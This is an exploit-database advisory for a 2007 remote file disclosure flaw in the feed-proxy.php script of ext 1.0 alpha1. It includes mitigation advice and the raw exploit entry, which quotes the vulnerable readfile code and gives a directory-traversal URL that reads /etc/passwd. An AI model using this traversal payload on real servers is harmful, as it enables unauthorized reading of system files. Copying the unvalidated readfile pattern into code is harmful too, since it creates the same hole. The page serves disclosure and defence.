header-logo
Suggest Exploit
vendor:
ext 1.0 alpha1
by:
Alkomandoz Hacker
5.5
CVSS
MEDIUM
Remote File Disclosure
22
CWE
Product Name: ext 1.0 alpha1
Affected Version From: ext 1.0 alpha1
Affected Version To: ext 1.0 alpha1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure

This vulnerability allows an attacker to disclose files remotely using the feed-proxy.php script in ext 1.0 alpha1. By manipulating the 'feed' parameter in the URL, an attacker can access sensitive files on the server, such as /etc/passwd.

Mitigation:

To mitigate this vulnerability, the vendor should release a patch that properly validates user input and prevents directory traversal attacks. In the meantime, users are advised to restrict access to the affected script or remove it entirely if not needed.
Source

Exploit-DB raw data:

#  ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
# D.Script: http://yui-ext.com/deploy/ext-1.0-alpha1.zip
# Discovered by: Alkomandoz Hacker
# Homepage: http://www.asb-may.net - mohandko.com - sniper-sa.com - tryag.com
# V.Code In /examples/layout/feed-proxy.php

----------------------------------------------------------

header('Content-Type: text/xml');
       readfile($feed);
       return;
}
?>

----------------------------------------------------------

# Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=http../../../../../../etc/passwd

# Greetz To: AsbMay's Group & City Of Ghost Team

# milw0rm.com [2007-04-25]